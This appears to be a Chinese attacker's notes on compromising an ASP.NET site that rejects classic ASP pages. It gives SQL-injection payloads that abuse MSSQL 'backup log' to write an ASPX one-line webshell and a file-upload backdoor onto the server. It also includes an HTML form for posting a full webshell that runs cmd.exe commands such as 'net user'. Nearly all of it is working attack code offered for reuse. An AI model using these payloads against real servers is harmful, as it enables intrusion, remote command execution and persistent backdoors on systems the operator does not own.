遇到个BT的站.NND不支持ASP只支持ASPX,记录一下。 1.相当于ASP的一句话木马:
程序代码
alter database pubs set RECOVERY FULL-- create table pubs.dbo.cmd(a image) backup log pubs to disk = 'c:\TM' with init insert into pubs.dbo.cmd(a) values ('<%@ Page Language="C#" validateRequest="false" %><%System.IO.StreamWriter ow=new System.IO.StreamWriter(Server.MapPath("images.aspx"),false);ow.Write(Request.Params["l"]);ow.Close()%> ') backup log pubs to disk = 'd:\test11.aspx' //这个和asp的一样,客户端post一个变量l 把木马代码丢在变量l里面就ok了 这个是类似asp的一句话木马。 //mu.aspx.htm 客户端:(提交后访问:http://IP/images.aspx) <form action=http://192.168.2.100/asp/mu.aspx method=post> <b>在下面输入大马内容:</b><br> <textarea name=l cols=120 rows=35 width=45> <%@ Page Language="VB" Debug="true" %> <%@ import Namespace="system.IO" %> <%@ import Namespace="System.Diagnostics" %> <script runat="server"> Sub RunCmd(Src As Object, E As EventArgs) Dim myProcess As New Process() Dim myProcessStartInfo As New ProcessStartInfo(xpath.Text) myProcessStartInfo.UseShellExecute = False myProcessStartInfo.RedirectStandardOutput = true myProcess.StartInfo = myProcessStartInfo myProcessStartInfo.Arguments=xCmd.text myProcess.Start() Dim myStreamReader As StreamReader = myProcess.StandardOutput Dim myString As String = myStreamReader.Readtoend() myProcess.Close() mystring=replace(mystring,"<","<") mystring=replace(mystring,">",">") result.text= vbcrlf & "<pre>" & mystring & "</pre>" End Sub </script><html><head> <title>ASP.NET Shell for WebAdmin2.X Final</title> <meta http-equiv="Content-Type" c /></head><body> <form runat="server"> <asp:Label id="L_p" style="COLOR: #0000ff" runat="server" width="80px">;Program</asp:Label> <asp:TextBox id="xpath" style="BORDER-RIGHT: #084b8e 1px solid; BORDER-TOP: #084b8e 1px solid; BORDER-LEFT: #084b8e 1px solid; BORDER-BOTTOM: #084b8e 1px solid" runat="server" Width="300px">c:\windows\system32\cmd.exe</asp:TextBox><br /> <asp:Label id="L_a" style="COLOR: #0000ff" runat="server" width="80px">Arguments</asp:Label> <asp:TextBox id="xcmd" style="BORDER-RIGHT: #084b8e 1px solid; BORDER-TOP: #084b8e 1px solid; BORDER-LEFT: #084b8e 1px solid; BORDER-BOTTOM: #084b8e 1px solid" runat="server" Width="300px" Text="/c net user">/c net user</asp:TextBox><br /> <asp:Button id="Button" style="BORDER-RIGHT: #084b8e 1px solid; BORDER-TOP: #084b8e 1px solid; BORDER-LEFT: #084b8e 1px solid; COLOR: #ffffff; BORDER-BOTTOM: #084b8e 1px solid; BACKGROUND-COLOR: #719bc5" runat="server" Width="100px" Text="Run"></asp:Button><p> <asp:Label id="result" style="COLOR: #0000ff" runat="server"></asp:Label> </p></form></body></html> </textarea><BR><center><br> <input type=submit value=提交>
2、下面这个是我找网上的asp.net的上传文件程序,修改精简了下,也可以用:
程序代码 drop table pubs.dbo.cmd alter database pubs set RECOVERY FULL create table pubs.dbo.cmd(a image) backup log pubs to disk = 'c:\TM' with init insert into pubs.dbo.cmd(a) values ('<script language="c#" runat="server">private void bc(object o,EventArgs e) {string u="files";string filename;int pos=f.PostedFile.FileName.LastIndexOf("\\");filename=f.PostedFile.FileName.Substring(pos + 1);f.PostedFile.SaveAs(Server.MapPath(u)+"\\"+filename);}</script><form method="post" runat="server"><input type="file" id="f" runat="server"/><input type="submit" value="ss" runat="Server" /></form>') backup log pubs to disk = 'c:\inetpub\wwwroot\test11.aspx' |